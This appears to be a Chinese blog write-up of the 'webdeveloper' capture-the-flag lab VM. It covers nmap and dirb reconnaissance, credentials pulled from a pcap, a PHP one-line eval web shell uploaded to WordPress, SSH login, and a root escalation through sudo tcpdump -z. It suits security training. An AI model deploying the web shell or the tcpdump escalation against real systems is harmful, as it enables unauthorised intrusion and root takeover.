webdeveloper项目writeup

1.信息收集

1)打开黑盒机器webdevelop

发现进入一个登录界面,我们得到的有效信息是:黑盒机器webdevelpoer是一个ubuntu系统

2)确定kali的ip

ifconfig


3) 已经确定kali和黑盒机器是在同一局域网下的,所以进行nmap扫描

nmap -sP 192.168.145.0/24


排除掉较小的1和2,较大的254,以及kali的ip131,另外俩个黑盒机器132和129,我们确定webdevelop的ip为192.168.145.133

4)ping通webdevelop

 确定能ping通webdevelop,确定是能联网的,ctrl+c结束

5)对webdevelop进行nmap扫描

a)普通快速扫描

 b)若想获取更全面信息

nmap -p- -A ip

 发现端口22和80

tcp 22 SSH 可根据已搜集到的信息尝试爆破,v1版本可中间人,ssh隧道及内网代理转发,文件传输等等

tcp 80 通常提供web服务。

由于端口80的http协议,我们直接上火狐搜索

也可以dirb扫描一下目录

dirb http://192.168.145.133

此时信息搜集基本完成,下边进行漏洞利用

2.漏洞利用

由于有网站我们就可以把重心放在网站上

进入所有扫出来的网址看看,发现在ipdata的网页下有个流量包

下载下来用wireshark打开

 

然后尝试在登录界面随便输入账号密码,按f12查看network

 发现登录是POST请求

在wireshark中过滤查看

 疑似发现了用户账号信息

用户名:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

尝试登录

 成功登入

在网站中查找漏洞,上传一句话木马

<?php @eval($_POST['cmd'])?>

使用蚁剑建立连接

 测试连接成功,点击添加

点击新建立的数据,查看信息

 

在wp-config-php下发现数据库账号和密码 

 尝试登录ssh

ssh webdeveloper@192.168.145.133

 成功登入

下边进行用户越权

sudo -l

 查看权限

发现可以利用tcpdump提权

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

 

 成功越权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值